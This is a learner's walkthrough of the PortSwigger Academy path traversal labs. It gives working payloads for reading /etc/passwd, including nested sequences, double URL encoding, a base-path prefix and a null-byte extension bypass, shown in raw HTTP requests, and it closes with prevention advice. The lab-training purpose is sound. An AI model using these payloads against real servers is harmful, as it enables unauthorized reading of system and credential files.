1230 words
6 minutes
PortSwigger Academy - Path traversal.

https://portswigger.net/web-security/learning-paths/path-traversal

This learning path covers path traversal vulnerabilities. You’ll learn how to carry out path traversal attacks and circumvent common obstacles. You’ll also learn how to prevent path traversal attacks.


What is path traversal?#

Path traversal is also known as directory traversal. These vulnerabilities enable an attacker to read arbitrary files on the server that is running an application. This might include:

  • Application code and data.
  • Credentials for back-end systems.
  • Sensitive operating system files.

In some cases, an attacker might be able to write to arbitrary files on the server, allowing them to modify application data or behavior, and ultimately take full control of the server.

Reading arbitrary files via path traversal#

Imagine a shopping application that displays images of items for sale. This might load an image using the following HTML:

<img src="/loadImage?filename=218.png">

The loadImage URL takes a filename parameter and returns the contents of the specified file. The image files are stored on disk in the location /var/www/images/. To return an image, the application appends the requested filename to this base directory and uses a filesystem API to read the contents of the file. In other words, the application reads from the following file path:

/var/www/images/218.png

This application implements no defenses against path traversal attacks. As a result, an attacker can request the following URL to retrieve the /etc/passwd file from the server’s filesystem:

https://insecure-website.com/loadImage?filename=../../../etc/passwd

This causes the application to read from the following file path:

/var/www/images/../../../etc/passwd

The sequence ../ is valid within a file path, and means to step up one level in the directory structure. The three consecutive ../ sequences step up from /var/www/images/ to the filesystem root, and so the file that is actually read is:

/etc/passwd

On Unix-based operating systems, this is a standard file containing details of the users that are registered on the server, but an attacker could retrieve other arbitrary files using the same technique.

On Windows, both ../ and ..\ are valid directory traversal sequences. The following is an example of an equivalent attack against a Windows-based server:

https://insecure-website.com/loadImage?filename=..\..\..\windows\win.ini

LAB: File path traversal, simple case#

This lab contains a path traversal vulnerability in the display of product images. To solve the lab, retrieve the contents of the /etc/passwd file.

Solution#

To solve this, I started by right-clicking an image to grab its source URL. That gave me something like:

0aaf00eb033990da81ca5247006800a9.web-security-academy.net/image?filename=8.jpg

Then, I just kept adding ../ to the filename parameter a few times until I found the directory I was looking for.

The solution ended up being:

https://0aaf00eb033990da81ca5247006800a9.web-security-academy.net/image?filename=../../../etc/passwd

Common obstacles to exploiting path traversal vulnerabilities#

Many applications that place user input into file paths implement defenses against path traversal attacks. These can often be bypassed.

If an application strips or blocks directory traversal sequences from the user-supplied filename, it might be possible to bypass the defense using a variety of techniques.

You might be able to use an absolute path from the filesystem root, such as filename=/etc/passwd, to directly reference a file without using any traversal sequences.

Lab: File path traversal, traversal sequences blocked with absolute path bypass#

This lab contains a path traversal vulnerability in the display of product images.

The application blocks traversal sequences but treats the supplied filename as being relative to a default working directory.

To solve the lab, retrieve the contents of the /etc/passwd file.

Solution#

We intercept the request

GET /image?filename=5.jpg HTTP/2
Host: 0aa500d104625ca68276601f00de0098.web-security-academy.net
Cookie: session=GvEnpHbu8HvC87C9631Fuv2PbCXDjwyX
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-GB,en;q=0.9
Sec-Ch-Ua: "Not)A;Brand";v="8", "Chromium";v="138"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Sec-Ch-Ua-Mobile: ?0
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://0aa500d104625ca68276601f00de0098.web-security-academy.net/
Accept-Encoding: gzip, deflate, br
Priority: i`

and change
GET /image?filename=5.jpg
for
GET /image?filename=/etc/passwd

Common obstacles to exploiting path traversal vulnerabilities - Continued#

You might be able to use nested traversal sequences, such as ....// or ....\/. These revert to simple traversal sequences when the inner sequence is stripped.

Lab: File path traversal, traversal sequences stripped non-recursively#

This lab contains a path traversal vulnerability in the display of product images.

The application strips path traversal sequences from the user-supplied filename before using it.

To solve the lab, retrieve the contents of the /etc/passwd file.

Solution#

Since the lab strips path traversal sequences, using:

GET /image?filename=../../../etc/passwd HTTP/2
Host: 0a78008203c6729a829a255500bd0024.web-security-academy.net
Cookie: session=RoX9uyjy6phuxm1jfFK3AksmsDJ5GQAg
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-GB,en;q=0.9
Sec-Ch-Ua: "Not)A;Brand";v="8", "Chromium";v="138"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Sec-Ch-Ua-Mobile: ?0
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://0a78008203c6729a829a255500bd0024.web-security-academy.net/
Accept-Encoding: gzip, deflate, br
Priority: u=2, i`

gets us:

HTTP/2 400 Bad Request
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 14
"No such file"`

What we can do is replace
GET /image?filename=../../../etc/passwd HTTP/2
for
GET /image?filename=....//....//....//etc/passwd HTTP/2

Common obstacles to exploiting path traversal vulnerabilities - Continued#

In some contexts, such as in a URL path or the filename parameter of a multipart/form-data request, web servers may strip any directory traversal sequences before passing your input to the application. You can sometimes bypass this kind of sanitization by URL encoding, or even double URL encoding, the ../ characters. This results in %2e%2e%2f and %252e%252e%252f respectively. Various non-standard encodings, such as ..%c0%af or ..%ef%bc%8f, may also work.

Lab: File path traversal, traversal sequences stripped with superfluous URL-decode#

This lab contains a path traversal vulnerability in the display of product images.

The application blocks input containing path traversal sequences. It then performs a URL-decode of the input before using it.

To solve the lab, retrieve the contents of the /etc/passwd file.

Solution#

At first I tried:

GET /image?filename=../../../etc/passwd HTTP/2
and
GET /image?filename=....//....//....//etc/passwd HTTP/2

But we got

HTTP/2 400 Bad Request
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 14
"No such file"`

Instead we double encode the ../ part:
../ —> %2e%2e%2f —> %252e%252e%252f

GET /image?filename=%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd HTTP/2

Common obstacles to exploiting path traversal vulnerabilities - Continued#

An application may require the user-supplied filename to start with the expected base folder, such as /var/www/images. In this case, it might be possible to include the required base folder followed by suitable traversal sequences. For example: filename=/var/www/images/../../../etc/passwd.

Lab: File path traversal, validation of start of path#

This lab contains a path traversal vulnerability in the display of product images.

The application transmits the full file path via a request parameter, and validates that the supplied path starts with the expected folder.

To solve the lab, retrieve the contents of the /etc/passwd file.

Solution#

We replace

GET /image?filename=/var/www/images/47.jpg HTTP/2
for
GET /image?filename=/var/www/images/../../../etc/passwd

Common obstacles to exploiting path traversal vulnerabilities - Continued#

An application may require the user-supplied filename to end with an expected file extension, such as .png. In this case, it might be possible to use a null byte to effectively terminate the file path before the required extension. For example: filename=../../../etc/passwd%00.png.

Lab: File path traversal, validation of file extension with null byte bypass#

This lab contains a path traversal vulnerability in the display of product images.

The application validates that the supplied filename ends with the expected file extension.

To solve the lab, retrieve the contents of the /etc/passwd file.

Solution#

We use the null byte trick: filename=../../../etc/passwd%00.png.

How to prevent a path traversal attack#

The most effective way to prevent path traversal vulnerabilities is to avoid passing user-supplied input to filesystem APIs altogether. Many application functions that do this can be rewritten to deliver the same behavior in a safer way.

If you can’t avoid passing user-supplied input to filesystem APIs, we recommend using two layers of defense to prevent attacks:

  • Validate the user input before processing it. Ideally, compare the user input with a whitelist of permitted values. If that isn’t possible, verify that the input contains only permitted content, such as alphanumeric characters only.
  • After validating the supplied input, append the input to the base directory and use a platform filesystem API to canonicalize the path. Verify that the canonicalized path starts with the expected base directory.

Below is an example of some simple Java code to validate the canonical path of a file based on user input:

File file = new File(BASE_DIRECTORY, userInput); if (file.getCanonicalPath().startsWith(BASE_DIRECTORY)) { // process file }